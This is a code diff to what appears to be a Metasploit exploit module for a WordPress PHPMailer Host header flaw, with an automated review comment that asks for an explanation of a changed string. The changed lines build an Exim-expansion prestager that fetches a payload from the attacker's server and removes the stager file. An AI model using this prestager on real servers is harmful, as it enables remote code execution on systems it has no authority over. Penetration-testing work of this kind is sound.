diff --git a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
index ee428b9ec6..a811320d2b 100644
--- a/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
+++ b/modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
@@ -100,7 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
 # This is basically sh -c `wget` implemented using Exim string expansions
 prestager << '/bin/sh -c ${extract{-1}{${run{/bin/echo}}}{${readsocket{' \
 "inet:#{srvhost_addr}:#{srvport}}{get #{get_resource} "\
- 'http/1.0${run{/bin/echo}}${run{/bin/echo}}}}}}'
+ 'http/1.0${extract{0}{${run{/bin/echo}}}{$value$value}}}}}}'
 # CmdStager should rm the file, but it blocks on the payload, so we do it
 prestager << "/bin/rm -f #{cmdstager_path}"
 end
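Review bot: The new `'http/1.0${extract{0}{${run{/bin/echo}}}{$value$value}}...'` literal is harder to read than the two `${run{/bin/echo}}` calls it replaces, and nothing in the hunk explains it. It appears to run `/bin/echo` once and repeat its output through `$value`, but that relies on Exim expansion behaviour a maintainer would have to look up, and the commit gives no reason for the change. Because the literal sits in a backslash-continued string, the explanation belongs in the comment above `prestager <<`, for example `# $value$value repeats one echo's newline to end the request line and headers`, corrected to the real motivation. Module documentation, tests or detection signatures that quote the old literal, if any exist, need the same update since the string sent changes. The enclosing method starts outside the hunk.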